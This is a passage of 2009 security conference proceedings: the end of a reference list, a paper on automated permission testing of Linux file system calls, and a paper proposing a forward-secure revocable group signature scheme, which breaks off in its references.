5. Negi, R., Goel, S.: Secret communication using artificial noise. In: IEEE Vehicular Technology Conference, Toulouse, France (May 2006)
6. Parada, P., Blahut, R.: Secrecy capacity of SIMO and slow fading channels. In: IEEE International Symposium on Information Theory, Adelaide, Australia (September 2005)
7. Barros, J., Rodrigues, M.: Secrecy capacity of wireless channels. In: IEEE International Symposium on Information Theory, USA (2006)
8. Bloch, M., Barros, J., Rodrigues, M., Mclaughlin, S.: Wireless information theoretic security. IEEE Transactions on Information Theory 54(6), 2515–2534 (2008)
9. Cover, T., Thomas, J.: Elements of Information Theory. Wiley, Chichester (1991)
10. Horn, R.A., Johnson, C.R.: Matrix Analysis. Cambridge University Press, Cambridge (1987)
11. Li, X., Ratazzi, E.P.: MIMO transmissions with information theoretic secrecy for secret key agreement in wireless networks. In: IEEE Military Communications Conference (MILCOM 2005), Atlantic City, NJ (2005)
12. Li, X., Chen, M., Ratazzi, E.P.: Space time transmissions for wireless secret key agreement with information-theoretic secrecy. In: IEEE International Workshop on Signal Processing Advances in Wireless Communications (SPAWC 2005). The Italian Academy at Columbia University, New York (2005)
13. Viswanath, P., Tse, D.: Fundamentals of wireless communications, class notes for ECE 459, Department of Electrical and Computer Engineering, University of Illinois at Urbana Champaign (Fall 2003)
14. Shafiee, S., Liu, N., Ulukus, S.: Secrecy Capacity of the 2-2-1 Gaussian MIMO Wire-tap Channel. In: ISCCSP (2008)
15. Islam, M.R., Kim, J., Arefin, M.S.: Secrecy capacity of MIMO channels. In: ICECE (2008)
Security Testing for Operating System and Its System Calls*
Gaoshou Zhai, Hanhui Niu, Na Yang, Minli Tian, Chengyu Liu, and Hengsheng Yang
School of Computer and Information Technology, Beijing Jiaotong University, Shang Yuan Cun 3#, Hai Dian District, Beijing 100044, China
[email protected]
Abstract. It is very important but quite difficult to test the security of an operating system. In this paper, some essential problems about security testing of an operating system are discussed, including the conception and extension of security testing, the feasibility and technical scheme for automated security testing of an operating system, the security of system calls, the testing sequence for system calls, etc. Thereafter, a prototype system (i.e. a series of testing tools) for automated security testing of system calls is designed and implemented based on Fedora 9 and Linux kernel 2.6.25-14.fc9.i686, which is made up of a control module, an objects setup module, a standard test module, a special test module and a test configuration database for each system call. Furthermore, test cases as well as test results for system calls such as creat, access, etc. are discussed and analyzed. Finally, the research work in this paper is summarized while further research directions are pointed out.
Keywords: Operating systems, security testing, test automation, system calls, Linux.
1 Introduction
It is commonly accepted that operating systems and their security are of the greatest importance to entire information systems [1]. Therefore, testing and evaluating the security of operating systems becomes a key problem in the domain of information security [2]. Although some security evaluation criteria such as TCSEC [3] and CC [4] have been released, security testing of an operating system is still a quite difficult problem because of its largeness and complexity. In this paper, some essential problems about security testing of an operating system are discussed first, including the conception and extension of security testing, the feasibility and technical scheme for automated security testing of an operating system, the security of system calls, the testing sequence for system calls, etc. Moreover, both the feasibility and the solution for automatic security testing of system calls are analyzed for Linux operating systems. In view of the huge number of Linux system calls, the security of system calls and the principle for determining the security testing sequence are further discussed. Thereafter, a prototype system for automated security testing of system calls is designed and implemented based on Fedora 9 and Linux kernel 2.6.25-14.fc9.i686, which is made up of a control module, an objects setup module, a standard test module, a special test module and a test configuration database for each system call. The control module is used to control the test process. The standard test module and the special test module are used for testing the different aspects of system calls. Except for the definition of some common global variables, the rest of the test preparation work, such as setting up the test environment and creating objects, is finished by the test configuration database and the objects setup module together. Furthermore, test cases as well as test results for system calls such as creat, access, chmod, chown, mkdir, etc. are discussed and analyzed. Finally, the research work in this paper is summarized while some further research directions are pointed out.
* The research presented in this paper was performed with the support of Beijing Jiaotong University Grants for 2005SM016.
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 116–123, 2009. © Springer-Verlag Berlin Heidelberg 2009
2 Theoretical Foundation
Above all, the conception of security testing ought to be clarified. Then the feasibility of automated security testing of an operating system is discussed, the corresponding technical scheme is outlined, and the security testing sequence for different system calls is further discussed.
2.1 Conception and Extension of Security Testing
Security testing is a form of system testing whereby you try to compromise the security mechanisms of an application or system, and it is the process of attempting to devise test cases that subvert the program's security checks [5]. From the view of modern software engineering, security testing [2] spreads over the entire software development lifecycle, and its test objects encompass not only source code and the execution system, but also documents, the procedure management of development, etc. Meanwhile, methods of formal validation, informal validation (e.g. reviewing, discussion, validation and system testing) and simulated intrusion detection can be used to implement security testing. Obviously, the method of system testing is essential for security testing of operating systems. Security testing is different from security evaluation, especially in that the latter is always performed by officially authorized organizations or agents, i.e. third-party security certification organizations. At the same time, they are interrelated in many aspects. For example, the former can be viewed as part of the latter, and they both depend on the security requirements of the target system. In order to devise sufficient but appropriate test cases for security testing, known security problems or bugs in similar systems can be studied according to published sources in magazines, chat rooms, newsgroups or the internet. However, test cases ought to be formulated with overall planning that takes all factors into consideration from the beginning. In other words, the security requirements of the target system should be analyzed and extracted based on the security objectives, function requirements and/or security mechanisms of the system and on some information evaluation criteria such as TCSEC and CC in the first place. For operating systems, security testing ought to be focused on security objectives such as confidentiality, integrity, usability, traceability, etc., and on system functions, especially those security-supporting functions inside the kernel (for example, functions operating on key system resources such as process control blocks and related to authorization mechanisms).
2.2 Security Testing Automation for an Operating System
Because security testing of an operating system is time consuming, costly and tedious, software test automation technologies ought to be used, and that is feasible. Moreover, an automatic security testing platform [2] for an operating system can be made up of a documents consistency check module, a system-call integrated tester, an intrusion detection module, command testers, system call testers, a configuration checker, a security audit tester and a security function configuration interface (Fig. 1 shows its framework).
Fig. 1. Framework of automatic security testing platform for an operating system
2.3 Security Testing of System Calls
System calls are the only way for the system kernel to provide user processes with services, and they are the sole path for user processes to enter the system kernel. In other words, they are the indispensable interface for users to use the computer to do something, or for applications to be executed to perform some tasks. Therefore, security testing of system calls is the most important. The security of system calls ought to be analyzed before the security testing starts. Because there are so many system calls in an operating system (e.g. there are over 300 system calls in Linux), only a few system calls which are familiar to us can be studied from the beginning. System calls related to file operation are selected to be discussed in this paper. In addition, relationships among system calls are taken into account to decide the testing sequence for different system calls, so as to improve the reuse of testing code and to reduce test costs.
3 Prototype Design and Implementation
A powerful automated testing framework must provide tools that address test planning, test design, test construction, test execution, and test results verification [6]. In the following sections of this paper, automatic security testing of system calls is discussed in detail.
3.1 Basic Framework
Fig. 2 shows the basic steps to test a system call, where OS represents the operating system and the security state ought to be composed of security attributes related to subjects, objects, the system authorization architecture, etc. In order to modularize the security tester of a system call, the test contents are divided into two parts, i.e. standard security testing and special security testing. Standard security testing tests whether the change of security attributes makes the system turn from a secure state into an insecure state. Meanwhile, special security testing tests the execution effects of security-support functions, and it is available only for some particular system calls. Therefore, a security tester for a system call can be made up of a control module, an objects setup module, a standard test module, a special test module and a test configuration database for each system call. The control module is used to control the test process in an orderly way so as to ensure its automation. The standard test module and the special test module are used for testing the different aspects of system calls, as described above. Except for the definition of some common global variables, the rest of the test preparation work, such as setting up the test environment and creating subjects (e.g. users with specified permissions and/or processes with specified functions and permissions) and objects (e.g. files and/or directories), is finished by the test configuration database (which provides standard security testing with security attributes) and the objects setup module together. Fig. 3 shows a detailed framework for the automatic security tester of a system call.
Fig. 2. Basic steps to test a system call
[Fig. 3 (figure not reproduced): the control module, the objects setup module (create various required subjects and objects), the standard test module and the special test module, each with its test configuration, together with the first-level and second-level test cases libraries; the steps shown are: initialize related data structures to set up the testing environment; track and record security testing; control the test stage of security testing; execute the system call; compare and check security attributes; verify testing results; generate test reports; clean up the testing environment.]
Fig. 3. Framework for automatic security tester of system call
3.2 Prototype Implementation
A prototype system (i.e. a series of testing tools) for automated security testing of system calls is designed and implemented based on Fedora 9 and Linux kernel 2.6.25-14.fc9.i686, and it is programmed in the C language. It ought to be pointed out that only some system calls related to file operation are selected (including creat, access, chmod, chown and mkdir) in the prototype. In addition, the security testing scope is limited to the basic security mechanism of discretionary access control at the current stage. The executable file of the security tester for each system call is generated by compiling and linking the source file containing the control module with the source file for the corresponding system call, so that security testing for each system call can be done by executing the executable file of the corresponding security tester. In addition, a script program is written to make security testing integrated and to cover multiple system calls.
4 Security Testing Execution and Results Analysis
Test cases for system calls such as creat, access, chmod, chown and mkdir are devised respectively, and the number of test cases is 46 in all.
4.1 Test Cases Design
Only the test cases for creat are discussed in detail below, so as to avoid excessive length. The system call creat is used to create a file, and the created file can be an ordinary file or a directory file. Its prototype is as follows:
asmlinkage long sys_creat(const char *pathname, int mode);
When creat is invoked, various parameters can be selected and set so as to implement different functions. In total, 6 test cases are formulated for standard security testing of creat. Test scenes include truncating an existing non-empty ordinary file, truncating an existing empty ordinary file, and creating a new file or directory. Therefore, three types of files are required for standard security testing of creat, i.e. an existing ordinary file (e.g. creat.reg), a newly created directory file (e.g. creat.dir) and a file (creat.reg or creat.dir) to be created in the directory creat.dir. The ACL of a file can be set empty or not. In addition, both the uid and gid of the process are set to 501, while the uid and gid of the file owner are set to 501 as well. Two test cases for standard security testing of creat are illustrated in Table 1 and Table 2 respectively.
Table 1. Test case CSYL-CREAT-BZ1# for standard security testing of creat
Test scene: to truncate an existing non-empty ordinary file.
Requirement for object ACL: NONE.
Test steps: (1) Create an ordinary file named creat.reg under the current path and set its mode to 0700, then write some data into that file. (2) Invoke and execute the system call creat with the file name creat.reg. (3) Check whether the ACL values of creat.reg are consistent before and after invoking creat. (4) Check whether creat.reg has become an empty file.
Expected results: (1) Invoking creat succeeds. (2) Both ACL values of creat.reg are empty before and after invoking creat. (3) creat.reg becomes an empty file.
Special security testing of creat focuses on its parameter PATHNAME. In total, 8 test cases are formulated for special security testing of creat, which suppose, respectively, that the string address specified by PATHNAME is beyond the permitted access space, that the destination pathname specified by PATHNAME is not a valid pathname, that the destination pathname specified by PATHNAME cannot be accessed for lack of authorization, that the destination pathname specified by PATHNAME does not exist, that the euid of the current process does not match the owner of the file and it has no permission on the latter, that the depth of the destination pathname specified by PATHNAME exceeds the upper limit PATH_MAX, that the length of the file name in the destination pathname specified by PATHNAME exceeds the upper limit NAME_MAX, or that there are too many symbolic links for the file to be created. A test case for special security testing of creat is illustrated in Table 3.
Table 2. Test case CSYL-CREAT-BZ4# for standard security testing of creat
Test scene: to truncate an existing non-empty ordinary file.
Requirement for object ACL: user::--- mask::--- group::rwx other::---
Test steps: (1) Create an ordinary file named creat.reg under the current path and set its mode to 0700, then write some data into that file. (2) Change the ACL of the file creat.reg to the requirement for object ACL. (3) Invoke and execute the system call creat with the file name creat.reg. (4) Check whether the ACL values of creat.reg are consistent before and after invoking creat. (5) Check whether creat.reg has become an empty file.
Expected results: invoking creat fails and returns -1 with error number EACCES. Obviously, both the ACL check and the empty check are unnecessary.
Table 3. Test case CSYL-CREAT-TS1# for special security testing of creat
Test scene: suppose that the string address specified by PATHNAME is beyond the permitted access space.
Test steps: (1) Invoke the system call creat with its parameter PATHNAME set to a char pointer with the value -2. (2) Check the return value of invoking creat.
Expected results: invoking creat fails and returns -1 with error number EFAULT, which stands for address fault.
4.2 Test Results Analysis
The prototype runs and gets all expected results for all those system calls, including creat, access, mkdir, chmod and chown, and for all their corresponding test cases. That is to say, with the required permissions they all execute normally and the corresponding changes of security attributes adhere to the established requirements. On the other hand, without permissions they all refuse to perform the specified functions or tasks and return the corresponding error codes.
5 Summary
Security testing is discussed from its conception to its relation with security evaluation. The framework of an automatic security testing platform for an operating system is outlined, and security testing of system calls is emphasized and expounded further. Thereafter, a prototype system for automated security testing of system calls is designed and implemented based on Fedora 9 and Linux kernel 2.6.25-14.fc9.i686. The prototype framework and its corresponding components, with test cases for file-operation-related system calls such as creat, access, etc., are presented in detail. Preliminary test results are satisfactory, which shows that our automatic security testing methods for an operating system and its system calls are feasible and effective. Nevertheless, much work remains to be done because of the largeness and complexity of the operating system and the huge number of Linux system calls. More system calls ought to be analyzed and tested automatically, not limited to discretionary access control but extended to other security mechanisms such as mandatory access control. In other words, security requirements should be extracted, expanded and refined based on further study of the operating system and/or security evaluation criteria and/or protection profiles. Automaton theory and clustering methods are expected to be used to reduce security states and to build an integrated system-call tester. In addition, methods for quality evaluation of security tests ought to be studied as well in future.
References
1. Zhai, G., Li, Y.: Analysis and Study of Security Mechanisms inside Linux Kernel. In: Proceedings of 2008 International Conference on Security Technology (SECTECH 2008), pp. 58–61. IEEE Computer Society, Los Alamitos (2008)
2. Zhai, G., Zeng, J., Ma, M., Zhang, L.: Implementation and Automatic Testing for Security Enhancement of Linux Based on Least Privilege. In: Proceedings of the 2nd International Conference on Information Security and Assurance (ISA 2008), pp. 181–186. IEEE Computer Society, Los Alamitos (2008)
3. Trusted Computer Systems Evaluation Criteria, US DoD 5200.28-STD (1985)
4. Common Criteria for Information Technology Security Evaluation. Version 2.2 (2008)
5. Myers, G.J., Badgett, T., Thomas, T.M., Sandler, C.: The Art of Software Testing, 2nd edn. John Wiley & Sons Inc., New Jersey (2004)
6. Mosley, D.J., Posey, B.A.: Just Enough Software Test Automation, 2nd edn. Pearson Education Inc., New Jersey (2002)
Efficient Group Signature with Forward Secure Revocation
Haimin Jin 1,2,3, Duncan S. Wong 3, and Yinlong Xu 1,2
1 School of Computer Science, University of Science and Technology of China, Hefei, China
2 The Key Laboratory on High Performance Computing, Anhui Province, Hefei, China
3 Department of Computer Science, City University of Hong Kong
[email protected],
[email protected]
Abstract. Forward secure revocation for group signature allows a revoked group member to preserve the anonymity of its signatures generated before the revocation. Most of the existing schemes of this type either have signing or verifying complexity linear in the group size or the number of revoked members, or require updates of the signing key or public key once revocation occurs. Recently, an outstanding improvement has been made in Nakanishi et al.'s proposal [15]. However, the size of the public key in their scheme is linear in the group size. In this paper, we propose a new forward secure revocable group signature scheme satisfying 1) constant signing and verifying complexity, 2) constant size of signature, public key and signing key, 3) no updates of public key or signing key are required when a member joins or is deleted.
1 Introduction
Group signature [11] is a signature scheme which allows a member of a group to sign messages on behalf of the group in such a way that no one can tell who the actual signer is (i.e. anonymity) except the group manager. The group manager is responsible for enrolling new members and identifying the actual signer in case of dispute (i.e. traceability). Besides enrolling new members into a group, some applications also require the group manager to remove members from the group (i.e. revocability) [3]. Once a user is removed, the user can no longer generate any signature for the group. An additional yet natural requirement is that after a user is revoked, its old signatures generated before the revocation should remain anonymous (i.e. forward secure revocation) [3]. In recent years, several forward secure revocable group signature schemes have been proposed [2, 4, 6, 7, 15, 16, 17]. Among them, the schemes proposed in [2, 6, 17] cannot achieve constant signing and verifying computational complexity. Camenisch and Lysyanskaya proposed an elegant revocable scheme [8] using dynamic accumulators. In this scheme, the complexity of signing/verifying is constant. However, the disadvantage of this scheme is that, whenever making a signature, the signer has to modify his signing key due to member joining or deletion. Some improvements have been made in [4] and [7] so that the updates of keys are only required when member revocation occurs. However, forward secure revocation is not carefully and formally analyzed in their schemes. Recently, a forward secure revocable group signature scheme with constant signing/verifying complexity was proposed in [15]. However, the size of the group manager's public key is set by the group size, which must be fixed in advance.
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 124–131, 2009. © Springer-Verlag Berlin Heidelberg 2009
Our Results. We propose a new group signature scheme which satisfies 1) forward secure revocation, 2) constant signing and verifying complexity, 3) constant size of the signature, the group manager's public key and the signer's key, 4) constant tracing complexity, 5) no updates of public key or signing key are required when a member joins or is deleted.
Related Work. Since the introduction of group signature by Chaum and van Heyst [11], a number of other schemes have been proposed [1, 2, 6, 8, 14]. The schemes proposed earlier [11, 14] all have signature size and signing complexity linear in the group size. The first scheme achieving constant size and complexity is due to Camenisch and Stadler [10]. In [3], Ateniese and Tsudik introduced the revocability property. There are two main types of revocable group signature schemes. The first type is the VLR (Verifier-Local Revocation) method [2, 3, 5], which has a Certificate Revocation List (CRL). The CRL contains information about the revoked users. It is used for determining whether a signature was generated by a revoked member during signature verification. However, the verifying complexity of the VLR mechanism is usually linear in the number of revoked members. Another type of scheme [4, 6, 7, 8] is based on accumulators.
In these schemes, an accumulator is employed for storing information about the legitimate group members. During signature generation, a signer produces a membership proof in association with a signature. The membership proof shows anonymously that the accumulator contains the signer's information (i.e. membership certificate). If the signer is revoked, the information specific to the signer is removed from the accumulator and the signer will no longer be able to produce a valid membership proof. Different from the above, in our construction we employ an accumulator on which non-membership proofs can be made. We store information about revoked members in the accumulator. When generating a signature, a signer produces a non-membership proof to show anonymously that the accumulator does not contain any information about the signer.
2 Definitions
Definition 1 (Revocable Group Signature). A group signature scheme with membership revocation consists of five probabilistic polynomial-time (PPT) algorithms and one interactive protocol. The entities involved in the scheme are a group manager, a group member (i.e. a signer) and a verifier.
– G.Kg: On input a security parameter $l \in \mathbb{N}$, the group manager outputs a master public key $mpk$, a master secret key $msk$ (for enrolling group members), a trace key $tk$ (for opening a signature) and an initialized membership information $\Omega$.
– G.Enroll: This is an interactive protocol running between the group manager and a new user with identity $i \in \mathbb{N}$. Through this protocol, the member $i$ obtains a user signing key $usk_i$, a (public) user membership key $upk_i$, and a user revocation key $rvk_i$.
– G.Revoke: On input $mpk$, $rvk_i$ (of member $i$) and the current membership information $\Omega$, the group manager outputs an updated $\Omega$.
– G.Sign: On input $mpk$, $upk$, $usk$, $rvk$, $\Omega$ and a message $m$, it outputs a group signature $\sigma$.
– G.Ver: On input $mpk$, $\Omega$, $m$ and $\sigma$, it outputs 1 or 0 indicating accept or reject on the validity of the signature $\sigma$ on message $m$.
– G.Open: On input $mpk$, $tk$, $c$ and a valid message-signature pair $(m, \sigma)$, the group manager outputs $upk$ of the actual signer.
Remark: A group signature scheme without membership revocation only differs slightly from the definition above. It does not have G.Revoke and therefore does not need $rvk$ or the revocation membership information $\Omega$.
3 Signature of Knowledge
We use signatures of knowledge as building blocks. Many group signature schemes use this notion [6], [15], [1]. This cryptographic tool is derived from the signature scheme of [13], which allows one party to prove knowledge of secret values without revealing any information about them. Since it is message independent (being based on signature schemes), we call it a signature of knowledge to avoid confusion with zero-knowledge proofs. In this paper, we use SPK[(x_1, ..., x_t) : R_1(x_1, ..., x_t) ∧ ... ∧ R_n(x_1, ..., x_t)](m) to denote the signature of knowledge, which is a signature on message m by a signer who knows secret values x_1, ..., x_t satisfying all the relations R_1(x_1, ..., x_t), ..., R_n(x_1, ..., x_t). The signature of knowledge of a representation (informally of the form SPK[(x, y) : c = g^x h^y mod n](m)) is proposed in [12], and the signature of knowledge of a representation with parts in intervals (informally of the form SPK[(x, y) : c = g^x h^y mod n ∧ x ∈ [X − 2^l, X + 2^l]](m)) is proposed in [9].
4 Our Scheme and Security Analysis
According to Def. 1, our scheme is constructed as follows.
1. G.Kg: With the input of > 1, k, l_p ∈ N, which are the security parameters, the group manager chooses the following parameters: λ1, λ2, γ1 and γ2 such that λ1 > (λ2 + k) + 2, λ2 > 4l_p, γ1 > (γ2 + k) + 2, and γ2 > λ1 + 2. Define
the integral ranges Λ = [2^{λ1} − 2^{λ2}, 2^{λ1} + 2^{λ2}] and Γ = [2^{γ1} − 2^{γ2}, 2^{γ1} + 2^{γ2}]. Note that H : {0,1}* → {0,1}^k is a collision-resistant hash function. The parameter controls the tightness of the statistical zero-knowledgeness and the parameter l_p sets the size of the modulus to use. All these parameters are public. The group manager computes the group public key mpk = (n, a, a0, y, g, h, g1, g2) and the secret key msk = (p', q', x) as follows:
(a) Select random l_p-bit primes p', q' such that p = 2p' + 1 and q = 2q' + 1 are prime. Set the modulus n = pq. Note that all the arithmetic operations in the following sections are modulo n unless specified otherwise.
(b) Choose random elements a, a0, g, h, g1, g2 ∈_R QR(n) (of order p'q'), where QR(n) denotes the set of quadratic residues of the group Z*_n.
(c) Choose a random secret x ∈_R Z*_{p'q'}, and set y = g^x.
The membership information is Ω = (c, μ), where c is initialized to g1 and μ is initialized to 1.
2. G.Enroll: The usk_i, rvk_i, upk_i of the new member i are generated as follows:
(a) The member i generates a secret exponent x̃_i ∈_R [0, 2^{λ2}] and a random integer r̃_i ∈_R [0, n], sends C1 = g^{x̃_i} h^{r̃_i} to the group manager and proves knowledge of the representation of C1, i.e., sends the signature of knowledge W = SPK[(x̃_i, r̃_i) : C1 = g^{x̃_i} h^{r̃_i}](0) (see the construction in [12]).
(b) The group manager checks that C1 ∈ QR(n). If this is the case, the group manager selects α_i, β_i ∈_R [0, 2^{λ2}] at random and sends (α_i, β_i) to member i.
(c) Member i computes x_i = 2^{λ1} + (α_i x̃_i + β_i mod 2^{λ2}) in Z and sends the group manager the value C2 = a^{x_i}. Member i also proves to the group manager:
i. that the discrete log of C2 with respect to base a lies in Λ, i.e., SPK[x_i : C2 = a^{x_i} ∧ x_i ∈ Λ](0) (see the construction in [12]);
ii. that the user’s membership secret x_i = log_a C2 is correctly computed from C1, α_i and β_i, as follows:
A. computes u = α_i x̃_i + β_i mod 2^{λ2}, v = (α_i x̃_i + β_i) / 2^{λ2} in Z and w = α_i r̃_i in Z, and proves that
B. u lies in [−2^{λ2}, 2^{λ2}] and equals the discrete log of C2 / a^{2^{λ1}} with respect to base a, i.e., computes SPK[u : a^u = C2 / a^{2^{λ1}} ∧ u ∈ [−2^{λ2}, 2^{λ2}]](0) (see the construction in [9]);
C. C1^{α_i} g^{β_i} equals g^u (g^{2^{λ2}})^v h^w, i.e., computes SPK[(α_i, β_i, u, v, w) : C1^{α_i} g^{β_i} = g^u (g^{2^{λ2}})^v h^w](0) (it is easy to get the construction from [12]).
(d) The group manager checks that C2 ∈ QR(n). If this is the case and all the above proofs were correct, the group manager selects a random prime e_i ∈_R Γ and computes A_i = (C2 a0)^{1/e_i} = (a^{x_i} a0)^{1/e_i}. Then the group manager sets upk_i = A_i, rvk_i = e_i. Finally, the group manager sends [A_i, e_i] to member i.
(e) Member i verifies that a^{x_i} a0 = A_i^{e_i}. If this is the case, member i sets upk_i = A_i, rvk_i = e_i and usk_i = x_i.
The algorithms Join, Iss are implied by the G.Enroll protocol.
3. G.Revoke: On input rvk_k of member k, who is to be deleted this time, and the current Ω = (c, μ), the group manager updates c as c = c^{rvk_k} and μ as μ = μ · rvk_k. Suppose the members revoked so far are j, ..., k; then the latest c = g1^{∏_{i=j}^{k} rvk_i} and μ = ∏_{i=j}^{k} rvk_i.
4. G.Sign: A group signature σ on message m consists of a tuple (Ṽ1, Ṽ2) which is generated as follows:
(a) Member i computes a signature of knowledge Ṽ1 = SPK[(r, x_i, rvk_i, A_i) : T1 = y^r A_i ∧ T2 = g^r ∧ T3 = h^r g^{rvk_i} ∧ a^{x_i} a0 = A_i^{rvk_i} ∧ x_i ∈ Λ ∧ rvk_i ∈ Γ](m) as shown in Table 1:
Table 1. The construction of the signature of knowledge Ṽ1
1. Randomly choose r ∈_R {0,1}^{2l_p} and compute T1 = y^r A_i, T2 = g^r, T3 = g^{rvk_i} h^r.
2. Randomly choose r1 ∈_R ±{0,1}^{γ2+k}, r2 ∈_R ±{0,1}^{λ2+k}, r3 ∈_R ±{0,1}^{γ1+2l_p+k+1}, r4 ∈_R ±{0,1}^{2l_p+k} and compute:
(a) d1 = T1^{r1} / (a^{r2} y^{r3}), d2 = T2^{r1} / g^{r3}, d3 = g^{r4}, d4 = g^{r1} h^{r4}
(b) v = H(g||h||y||a0||a||T1||T2||T3||d1||d2||d3||d4||m)
(c) s1 = r1 − v(rvk_i − 2^{γ1}), s2 = r2 − v(x_i − 2^{λ1}), s3 = r3 − v · rvk_i · r, and s4 = r4 − v · r (all in Z)
(d) Output (v, s1, s2, s3, s4, T1, T2, T3)
(b) Member i computes a signature of knowledge Ṽ2 to prove that his rvk_i, which is committed in T3, is not condensed in c (i.e., has not been revoked by the group manager) as follows:
i. Note that c = g1^μ, where μ = ∏_{i=j}^{k} rvk_i. Since gcd(rvk_i, μ) = 1, he can find f, b ∈ Z such that f · μ + b · rvk_i = 1. Let d = g1^{−b}.
ii. With c, f, d, rvk_i, r, he computes Ṽ2 = SPK[(rvk_i, r, f, d) : T3 = h^r g^{rvk_i} ∧ c^f = d^{rvk_i} g1 ∧ rvk_i ∈ Γ](m) as shown in Table 2.
Table 2. The construction of the signature of knowledge Ṽ2
1. Compute T4 = d g2^r.
2. Randomly choose r1 ∈_R ±{0,1}^{γ2+k}, r2 ∈_R ±{0,1}^{λ2+k}, r3 ∈_R ±{0,1}^{γ1+2l_p+k+1}, r4 ∈_R ±{0,1}^{2l_p+k} and compute:
(a) d1 = T4^{r1} / (c^{r2} g2^{r3}), d2 = g^{r1} h^{r4}
(b) v = H(g||h||g1||g2||c||T4||T3||d1||d2||m)
(c) s1 = r1 − v(rvk_i − 2^{γ1}), s2 = r2 − v(x_i − 2^{λ1}), s3 = r3 − v · rvk_i · r, and s4 = r4 − v · r (all in Z)
(d) Output (v, s1, s2, s3, s4, T4, T3) as Ṽ2
5. G.Ver: To verify a group signature σ = (Ṽ1, Ṽ2) on message m against the revocation membership information Ω (actually only c is required), the verifier checks the validity and correctness of Ṽ1, Ṽ2 with respect to mpk and Ω as follows.
– Verify Ṽ1: compute
v' = H(g||h||y||a0||a||T1||T2||T3|| a0^v T1^{s1 − v2^{γ1}} / (a^{s2 − v2^{λ1}} y^{s3}) || T2^{s1 − v2^{γ1}} / g^{s3} || T2^v g^{s4} || T3^v g^{s1 − v2^{γ1}} h^{s4} || m).
Return 1 for accept if and only if v = v', and s1 ∈ ±{0,1}^{(γ2+k)+1}, s2 ∈ ±{0,1}^{(λ2+k)+1}, s3 ∈ ±{0,1}^{(λ1+2l_p+k+1)+1}, and s4 ∈ ±{0,1}^{(2l_p+k)+1}. Otherwise, return 0 for reject.
– Verify Ṽ2: compute
v' = H(g||h||g1||g2||c||T4||T3|| (g1^{−1})^v T4^{s1 − v2^{γ1}} / (c^{s2 − v2^{λ1}} g2^{s3}) || T3^v g^{s1 − v2^{γ1}} h^{s4} || m).
Return 1 for accept if and only if v = v', and s1 ∈ ±{0,1}^{(γ2+k)+1}, s2 ∈ ±{0,1}^{(λ2+k)+1}, s3 ∈ ±{0,1}^{(λ1+2l_p+k+1)+1}, and s4 ∈ ±{0,1}^{(2l_p+k)+1}. Otherwise, return 0 for reject.
6. G.Open: Given a message-signature pair (m, σ = (Ṽ1, Ṽ2)) and the trace key tk = x, if G.Ver(mpk, Ω, m, σ) = 1 then output the upk_i computed as upk_i = T1 / T2^x (i.e. decrypt (T2, T1), which is an ElGamal ciphertext).
4.1 Security Analysis
Correctness and Traceability: If all the algorithms and the protocol described above are carried out accordingly, then a signature σ on message m generated as σ ← G.Sign(mpk, upk_i, usk_i, rvk_i, Ω, m) satisfies G.Ver(mpk, Ω, m, σ) = 1 for all m ∈ {0,1}*, and ũpk ← G.Open(mpk, tk, Ω, m, σ) satisfies ũpk = upk_i.
1. Correctness: According to the protocol, whenever σ ← G.Sign(mpk, upk, usk, rvk, Ω, m), we always have G.Ver(mpk, Ω, m, σ) = 1 for all m ∈ {0,1}*.
2. Traceability: Suppose there is a message and signature pair (m, σ) such that G.Ver(mpk, Ω, m, σ) = 1, where i ← G.Open(mpk, tk, Ω, m, σ). Suppose σ = (Ṽ1, Ṽ2), where Ṽ1 = {T1, T2, T3, ...}. If σ is valid, the validity of Ṽ1 ensures that there is a tuple (x_i, A_i, e_i, r) such that T1 = A_i y^r, T2 = g^r, T3 = g^{e_i} h^r, A_i = (a^{x_i} a0)^{1/e_i}, x_i ∈ Λ and e_i ∈ Γ. According to [1, Theorem 1], such a tuple can only be obtained via G.Enroll. And according to G.Open, we compute upk_i = T1 / T2^x = A_i. Hence, A_i can be uniquely linked to an instance of the G.Enroll protocol and thus the user i who originated the signature can be identified.
To give a formal security analysis, we also propose a set of security models for group signatures with forward secure revocation. The models are based on those proposed by Nakanishi et al. [15]. In the models, we define the notions of unforgeability, anonymity, forward secure revocation and non-frameability. We will provide the security models and proofs in the full version of this paper.
References
1. Ateniese, G., Camenisch, J., Joye, M., Tsudik, G.: A practical and provably secure coalition-resistant group signature scheme. In: Bellare, M. (ed.) CRYPTO 2000. LNCS, vol. 1880, pp. 255–270. Springer, Heidelberg (2000)
2. Ateniese, G., Song, D., Tsudik, G.: Quasi-efficient revocation of group signatures. In: Blaze, M. (ed.) FC 2002. LNCS, vol. 2357, pp. 183–197. Springer, Heidelberg (2003)
3. Ateniese, G., Tsudik, G.: Some open issues and new directions in group signatures. In: Franklin, M.K. (ed.) FC 1999. LNCS, vol. 1648, pp. 196–211. Springer, Heidelberg (1999)
4. Boneh, D., Boyen, X., Shacham, H.: Short group signatures. In: Franklin, M. (ed.) CRYPTO 2004. LNCS, vol. 3152, pp. 41–55. Springer, Heidelberg (2004)
5. Boneh, D., Shacham, H.: Group signatures with verifier-local revocation. In: Proc. CCS 2004, pp. 168–177. ACM, New York (2004)
6. Bresson, E., Stern, J.: Efficient revocation in group signatures. In: Kim, K.-c. (ed.) PKC 2001. LNCS, vol. 1992, pp. 190–206. Springer, Heidelberg (2001)
7. Camenisch, J., Groth, J.: Group signatures: Better efficiency and new theoretical aspects. In: Blundo, C., Cimato, S. (eds.) SCN 2004. LNCS, vol. 3352, pp. 120–133. Springer, Heidelberg (2005)
8. Camenisch, J., Lysyanskaya, A.: Dynamic accumulators and application to efficient revocation of anonymous credentials. In: Yung, M. (ed.) CRYPTO 2002. LNCS, vol. 2442, pp. 101–120. Springer, Heidelberg (2002)
9. Camenisch, J., Michels, M.: Separability and efficiency for generic group signature schemes. In: Wiener, M. (ed.) CRYPTO 1999. LNCS, vol. 1666, pp. 413–430. Springer, Heidelberg (1999)
10. Camenisch, J., Stadler, M.: Efficient group signature schemes for large groups. In: Kaliski Jr., B.S. (ed.) CRYPTO 1997. LNCS, vol. 1294, pp. 410–424. Springer, Heidelberg (1997)
11. Chaum, D., van Heyst, E.: Group signatures. In: Davies, D.W. (ed.) EUROCRYPT 1991. LNCS, vol. 547, pp. 257–265. Springer, Heidelberg (1991)
12. Damgård, I., Fujisaki, E.: A statistically-hiding integer commitment scheme based on groups with hidden order. In: Zheng, Y. (ed.) ASIACRYPT 2002. LNCS, vol. 2501, pp. 125–142. Springer, Heidelberg (2002)
